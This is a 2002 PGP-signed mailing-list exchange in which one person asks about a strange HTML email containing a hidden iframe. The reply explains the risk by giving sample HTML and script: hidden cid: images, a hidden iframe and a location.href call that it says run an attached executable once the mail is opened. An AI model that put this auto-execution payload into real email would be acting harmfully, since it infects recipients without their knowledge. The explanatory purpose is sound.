-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Roberto,
Hi! A script can call an attached executable automatically by just opening the email, not the attachment itself. This poses a security risk. An example of such a script: < img SRC="cid:mr.malware.to.you"; style="display:none"> < img id=W0W src="cid:malware.com"; style="display:none">< BR>< center>< h6>YOU!DORA< /h6>< /center> < IFRAME id=malware width=10 height=10 style="display:none" >< /IFRAME> < script> // 18.03.01 http://www.malware.com malware.location.href=W0W.src < /script where the first image is the executable. The second image is composed of simple JavaScripting and ActiveX control. What happens is, once the mail message is opened, the two 'embedded' images are instantly transferred to the 'embedded' folder. Then, the simple JavaScript: location.href automatically calls the second image composed of another JavaScript and ActiveX control. Though out of sight in the iframe, when these are triggered, the *.exe is run. The *.exe and JavaScript and ActiveX control reside in the same folder [the so-called "embedded' folder], these are also automatically called to the iframe. - -Leo Martinez - -----Original Message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Wednesday, May 29, 2002 10:02 AM To: [EMAIL PROTECTED] Subject: Weird HTML email I have been getting HTML email from different folks on one of my account. They all are similar to the HTML below. Can someone tell me what this email is all about? Does it pose a security threat? - -Roberto Cahanap <HTML><HEAD></HEAD><BODY> <iframe src=cid:S2oyJYo06RO0 height=0 width=0> </iframe> <FONT></FONT></BODY></HTML> -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com> iQA/AwUBPPXUGwYiKlr97dJ+EQJ4ogCfbxE02V2Qe4Zjz6DSIMxh3qVybA0AnRnR +6y28kpNz6Xs4wsS8i1x5tGd =XZid -----END PGP SIGNATURE-----
